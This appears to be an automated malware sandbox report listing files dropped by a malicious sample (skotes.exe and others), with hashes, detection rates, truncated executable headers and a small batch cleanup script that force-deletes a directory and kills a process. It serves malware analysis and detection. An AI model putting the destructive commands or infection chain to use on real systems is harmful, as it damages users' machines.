                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........`......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4438776
                                                                                                                                                                                          Entropy (8bit):7.99505709582503
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                          MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                          SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                          SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                          SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                          Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1997824
                                                                                                                                                                                          Entropy (8bit):7.95358397297698
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:2yL5ewo1kMMzT5v5rBtN3KqMp8AlaLrFSJbY:2yNewoQzlv5oqMMLrFSJbY
                                                                                                                                                                                          MD5:BD7AFE46E12BF9F5E618CA61FE125634
                                                                                                                                                                                          SHA1:AADC53BDF1FC6F6949E8B39B6344DFBBFCD67643
                                                                                                                                                                                          SHA-256:CF152965A474D633F886D13A72887971B6FA42E13C988C849700E25D4E7383BD
                                                                                                                                                                                          SHA-512:1A6439A02E7E7B2E2BA2609A11212F0DDC7F69542A433D6BD2D724CAE280F872EB32ABC80434EFE43609588B622CC237B3A8ED527B7B5A17FC4986A6A525CB8C
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.|...^.......`L...........@...........................L...........@.................................V...j.......l........................................................................................................... . .........<..................@....rsrc...l............L..............@....idata .............T..............@... .`*..........V..............@...kucwzsnp.....P2......X..............@...vgfkproo.....PL......V..............@....taggant.0...`L.."...Z..............@...........................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:NlllulvvS///Z:NllUi
                                                                                                                                                                                          MD5:55BC955DC3003949E539647F9FBE420D
                                                                                                                                                                                          SHA1:BF2448042589EBF7D4DF5590F9FCDDD65D091BEE
                                                                                                                                                                                          SHA-256:9D89A8C1E8F6E379DFB09D13BF027251D33BD5C5ED903242EF2AA76482890D71
                                                                                                                                                                                          SHA-512:F20E3FC2724FA273DD183D178EDC21BFE56888E6409FE7028401816413F2BC69157A1ABDD265349744E41845985B8087DCF62C9E75F5637D1413B6B258B1C838
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:@...e...................................7............@..........
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):776832
                                                                                                                                                                                          Entropy (8bit):7.859727158445845
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
                                                                                                                                                                                          MD5:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                          SHA1:3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
                                                                                                                                                                                          SHA-256:C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
                                                                                                                                                                                          SHA-512:928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4438776
                                                                                                                                                                                          Entropy (8bit):7.99505709582503
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                          MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                          SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                          SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                          SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                          Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1997824
                                                                                                                                                                                          Entropy (8bit):7.95358397297698
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:2yL5ewo1kMMzT5v5rBtN3KqMp8AlaLrFSJbY:2yNewoQzlv5oqMMLrFSJbY
                                                                                                                                                                                          MD5:BD7AFE46E12BF9F5E618CA61FE125634
                                                                                                                                                                                          SHA1:AADC53BDF1FC6F6949E8B39B6344DFBBFCD67643
                                                                                                                                                                                          SHA-256:CF152965A474D633F886D13A72887971B6FA42E13C988C849700E25D4E7383BD
                                                                                                                                                                                          SHA-512:1A6439A02E7E7B2E2BA2609A11212F0DDC7F69542A433D6BD2D724CAE280F872EB32ABC80434EFE43609588B622CC237B3A8ED527B7B5A17FC4986A6A525CB8C
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.|...^.......`L...........@...........................L...........@.................................V...j.......l........................................................................................................... . .........<..................@....rsrc...l............L..............@....idata .............T..............@... .`*..........V..............@...kucwzsnp.....P2......X..............@...vgfkproo.....PL......V..............@....taggant.0...`L.."...Z..............@...........................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):765568
                                                                                                                                                                                          Entropy (8bit):7.855393940952922
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:4mOcxtujRb4+DR8KwzkS5AMtCxCz3z8JAS3p9+TPtN4+DR8KwzkS5AMtCxCz3z8U:lGtPWQ8C8z3zcB59CNPWQ8C8z3zcB590
                                                                                                                                                                                          MD5:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                                                          SHA1:00296EA6A56F6E10A0F1450A20C5FB329B8856C1
                                                                                                                                                                                          SHA-256:3D51B9523B387859BC0D94246DFB216CFA82F9D650C8D11BE11ED67F70E7440B
                                                                                                                                                                                          SHA-512:1472E4670F469C43227B965984ECC223A526F6284363D8E08A3B5B55E602CCCE62DF4BC49939EE5BD7DF7B0C26E20DA896B084ECCAB767F8728E6BF14D71C840
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........`......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):3003904
                                                                                                                                                                                          Entropy (8bit):6.5534829387394264
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:1gK4zTjzmIGvbESuW1QoEi9YJlYAWA9XMv3MaDUyHAHE:p4zTGBvoSuW1Qof9lAWA9Xw3Ma4E
                                                                                                                                                                                          MD5:4072633A022E6587009B5CA189FF4613
                                                                                                                                                                                          SHA1:D54D3CF0878186B3B8230F1F0B8188BF1BCD738E
                                                                                                                                                                                          SHA-256:003B43813EC5522429EFC587A873871A2D6FC14C4C9C6008A7D27BCE0920DB19
                                                                                                                                                                                          SHA-512:136EBCB816217CECB81F5B521B7102D54EB17F4F0685AB003E7013CBFF75E7074EE93A086F847C5A0F9F0C3F2EB8C5C5706B07FE119182C86D2007699A98F700
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....j.....@.................................W...k...........................pi1............................. i1..................................................... . ............................@....rsrc...............................@....idata ............................@...rlgtiwao..*.......*.................@...yjhidprh.....p1.......-.............@....taggant.0....1.."....-.............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:modified
                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1679360
                                                                                                                                                                                          Entropy (8bit):6.278252955513617
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                          MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                          SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                          SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                          SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe
                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):468992
                                                                                                                                                                                          Entropy (8bit):6.157743912672224
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                                          MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                          SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                          SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                          SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1016852001\95ae71a780.exe
                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):222
                                                                                                                                                                                          Entropy (8bit):4.855194602218789
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                                          MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                          SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                          SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                          SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2355713
                                                                                                                                                                                          Entropy (8bit):5.891648193754473
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
                                                                                                                                                                                          MD5:579A63BEBCCBACAB8F14132F9FC31B89
                                                                                                                                                                                          SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
                                                                                                                                                                                          SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
                                                                                                                                                                                          SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1799594
                                                                                                                                                                                          Entropy (8bit):7.99773141173711
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
                                                                                                                                                                                          MD5:5659EBA6A774F9D5322F249AD989114A
                                                                                                                                                                                          SHA1:4BFB12AA98A1DC2206BAA0AC611877B815810E4C
                                                                                                                                                                                          SHA-256:E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
                                                                                                                                                                                          SHA-512:F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1799748
                                                                                                                                                                                          Entropy (8bit):7.997729415613798
                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                          SSDEEP:49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
